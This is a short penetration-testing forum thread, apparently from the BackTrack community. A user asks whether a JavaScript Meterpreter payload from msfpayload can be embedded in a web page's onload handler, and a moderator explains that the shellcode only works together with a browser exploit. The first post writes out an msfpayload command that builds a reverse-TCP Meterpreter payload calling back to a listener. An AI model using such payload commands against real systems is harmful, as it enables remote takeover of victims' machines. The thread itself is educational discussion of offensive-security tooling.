Results 1 to 2 of 2

Thread: Embedded Payload (javascript)

  1. #1
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    3

    Default Embedded Payload (javascript)

    I noticed that msfpayload had a js payload generator, and I was wondering if it was possible to just embed the payload in an onload call within an html page, kinda like so:

    First you would generate meterpreter payload and output to javascript [J]

    i.e. ./msfpayload windows/meterpreter/reverse_tcp LHOST=000.000.0.0 LPORT=4444 J > meterpreter.js

    then open copy generated script source and paste it within exploit page's html like below:


    </body onload="meterpreterpayload();">
    </body

    meterpreterpayload()
    {
    ###pasted js script generated by msfpayload###
    }
    >

    I tried it exactly as mentioned here, and didn't pick up anything on my handler when I opened the page in my test Virtual Machine, but I bet you get the idea. Please let me know if you have any suggestions, or if it's just not that easy...

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: Embedded Payload (javascript)

    Nope not that easy. The output from msfpayload is shellcode in Javascript format.

    Its essentially machine language instructions, specific to a particular CPU architecture (X86 for the majority of paylods in msfpayload, but there are others) and Operating System. You would use the JS msfpayload option when you are writing an exploit that uses Javascript as part of the process to inject your own code into an already running process.

    As an example, I used it here when I wrote my tutorial on using heap spraying to inject shellcode into Internet Explorer via exploitation of a user after free vulnerability.

    This type of shellcode is also used in a number of Acrobat exploits I have seen, as Javascript is used to trigger the exploit.

    You cant just insert this into a web page and expect it to work. It needs to be used with an exploit of a vulnerability int he browser software (or plugins) itself.
    Last edited by lupin; 02-16-2010 at 06:22 AM.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

Similar Threads

  1. How to import a payload????
    By sab3awi in forum Beginners Forum
    Replies: 3
    Last Post: 02-11-2010, 03:20 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •